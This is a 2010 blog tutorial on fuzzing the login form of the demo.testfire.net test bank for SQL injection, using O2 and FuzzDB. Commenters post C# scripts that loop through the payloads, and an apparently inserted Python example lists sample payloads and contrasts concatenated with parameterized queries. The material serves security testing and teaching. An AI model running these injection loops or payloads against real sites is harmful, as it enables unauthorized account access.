Parsons Software Security Consulting Blog

SQL injection with O2 and FuzzDB Database plugin

O2 Database plugin testing for SQL injection.

Now that we have covered XSS with O2, we are going to go through SQL injection using FuzzDB.

Adam Muntner created FuzzDB using a number of sources.

fuzzdb helps identify security flaws in applications by aggregating known attack patterns, predictable resource names, and server response messages to create a comprehensive, repeatable set of malformed input test cases.


svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only

http://code.google.com/p/fuzzdb/downloads/detail?name=fuzzdb-1.08.tgz 

This code uses the FuzzDB plugin and fuzzes the database with different SQL injection payloads. It then takes a screenshot of each successful iteration.
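To show what the "successful iteration" oracle in that loop is actually finding, here is an added example (my own code, not the post's O2 script and not FuzzDB itself): a handful of constructed payloads in the style of FuzzDB's generic SQL injection list are run against a SQLite login query built by string concatenation and against the same query with bound parameters. The table, the credentials and the payloads are all constructed for the example.

```python
import sqlite3

# Constructed sample payloads in the style of FuzzDB's generic SQLi list
# (not the FuzzDB file itself, which has many more entries).
SAMPLE_SQLI_PAYLOADS = [
    "' OR '1'='1",   # AND binds tighter than OR, so this one fails here
    "' or 1=1--",    # comments out the password check
    "admin'--",      # picks a known account and comments out the rest
    "'",             # malformed: produces a syntax error, not a login
    "plainuser",     # benign string, should never log in
]


def make_db():
    """In-memory users table standing in for the demo bank's login backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT, passw TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def login_vulnerable(conn, username, password):
    """Query assembled by concatenation: the pattern the fuzz run detects."""
    sql = ("SELECT uid FROM users WHERE uid = '" + username
           + "' AND passw = '" + password + "'")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a broken query is a failed login, not a finding


def login_parameterized(conn, username, password):
    """Same query with bound parameters: payload text is data, never SQL."""
    sql = "SELECT uid FROM users WHERE uid = ? AND passw = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def fuzz_login(login, payloads, password="foo"):
    """Mirror the O2 loop: each payload in the uid field, a fixed junk password.
    Returns the payloads that logged in (the cases the script screenshots)."""
    conn = make_db()
    return [p for p in payloads if login(conn, p, password)]


if __name__ == "__main__":
    print("vulnerable   :", fuzz_login(login_vulnerable, SAMPLE_SQLI_PAYLOADS))
    print("parameterized:", fuzz_login(login_parameterized, SAMPLE_SQLI_PAYLOADS))
```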

The screenshots are above. If you have any questions, feel free to email me at mparsons1980@gmail.com.

Once again Parsons Software Security Consulting, LLC is offering unauthenticated scans for the holidays.  A few people have taken me up on this offer.

http://player.vimeo.com/video/17196966

Written by mparsons1980

November 25, 2010 at 3:04 am

3 Responses

  1. It’s not clear what script you used in this example. Could you post the script?

    Thiago Stuckert

    December 7, 2010 at 9:39 am

  2. Is it something like this?

    panel.clear();
    var ie = panel.add_IE().silent(true);

    //var tempFolder = "_altoro SQL Injection Tests".tempDir(false);
    var tempFolder = "_altoro SQL Injection Tests";

    // submit the login form with the given credentials and save a screenshot of the result
    Action<string,string> login =
    (username,password) => {
    ie.open("http://demo.testfire.net/bank/login.aspx");
    ie.field("uid").value(username);
    ie.field("passw").value(password);
    ie.button("Login").click();
    panel.screenshot().save(tempFolder.pathCombine(username.safeFileName() + ".jpg"));
    };

    var fuzzDb = new API_FuzzDB();

    var testCount = 0;
    var maxTests = -1; // make -1 to run all tests
    foreach(var payload in fuzzDb.payloads_SQLi_Generic())
    {
    if (maxTests > -1 && testCount++ >= maxTests)
    break;
    login(payload, "no password");
    }
    // files() returns a list, so use its Count for the number of screenshots
    return "There are {0} screenshots in the folder {1}".format(tempFolder.files().Count, tempFolder);

    //O2File:API_FuzzDB.cs
    //O2File:API_Cropper.cs
    //O2File:WatiN_IE_ExtensionMethods.cs
    //using O2.XRules.Database.Utils.O2
    //O2Ref:WatiN.Core.1x.dll

    Thiago Stuckert

    December 7, 2010 at 10:00 am

  3. I hadn’t seen the HD version of the video.
    I improved the script but I couldn’t do the parse to int in the final message.

    Follow the script:

    panel.clear();
    var ie = panel.add_IE().silent(true);
    ie.disableFlashing(); // use this when developing the script to make it faster

    var tempFolder = "_altoro SQL Injection Tests".tempDir(false);

    // submit the login form; a screenshot is only taken when the post-login page is reached
    Action<string,string> login =
    (username,password) => {
    ie.open("http://demo.testfire.net/bank/login.aspx");
    ie.field("uid").value(username);
    ie.field("passw").value(password);
    ie.button("Login").click();
    if(ie.hasField("GO")) // login succeeded, take a screenshot
    panel.screenshot().save(tempFolder.pathCombine(username.safeFileName()+".jpg"));
    };

    var fuzzDb = new API_FuzzDB();

    var testCount = 0;
    var maxTests = 10000000;

    foreach(var payload in fuzzDb.payloads_SQLi_Generic())
    {
    testCount++;
    if(testCount>maxTests)
    break;

    login(payload,"foo");
    }
    // files() returns a list, so use its Count for the number of screenshots
    return "There are {0} screenshots in the folder {1}".format(tempFolder.files().Count, tempFolder);

    //O2File:API_FuzzDB.cs
    //O2File:API_Cropper.cs
    //O2File:WatiN_IE_ExtensionMethods.cs
    //using O2.XRules.Database.Utils.O2
    //O2Ref:WatiN.Core.1x.dll

    Thiago Stuckert

    December 7, 2010 at 12:57 pm
